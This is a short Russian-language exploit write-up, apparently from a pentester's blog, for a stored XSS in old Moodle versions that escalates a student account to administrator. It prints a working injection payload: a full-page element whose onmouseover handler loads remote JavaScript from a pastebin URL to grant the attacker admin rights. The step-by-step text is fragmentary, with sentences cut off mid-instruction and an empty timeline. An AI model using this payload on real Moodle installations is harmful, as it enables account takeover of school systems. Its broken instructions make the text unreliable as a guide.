
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC для повышения привилегий (от студента до администратора)
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC для повышения привилегий (от студента до администратора). Это одна из прошлых ошибок, которую я обнаружил во время прошлого пентеста в академическом учреждении. На тот момент она была достаточно успешной, чтобы практически украсть права администратора и получить полный контроль над Moodle, используя всего одну простую ошибку.
Мы видим из истории git, что ошибка существовала с ранних версий Moodle (2003) и была исправлена только в 2019 году.
Хронология:
ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ. НЕ ИСПОЛЬЗУЙТЕ ЭКСПЛОЙТ ДЛЯ НЕЗАКОННЫХ ДЕЙСТВИЙ. АВТОР НЕ НЕСЕТ ОТВЕТСТВЕННОСТИ ЗА ЛЮБОЕ НЕПРАВИЛЬНОЕ ИСПОЛЬЗОВАНИЕ ИЛИ УЩЕРБ.
userid на свой собственный id. Допустим, URL будет https://pastebin.com/raw/xxxxxxxx." style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')/userpix/ или поместите ссылку на эту страницу в свой пост и ждите.В случае успеха ваша учетная запись будет добавлена как администратор.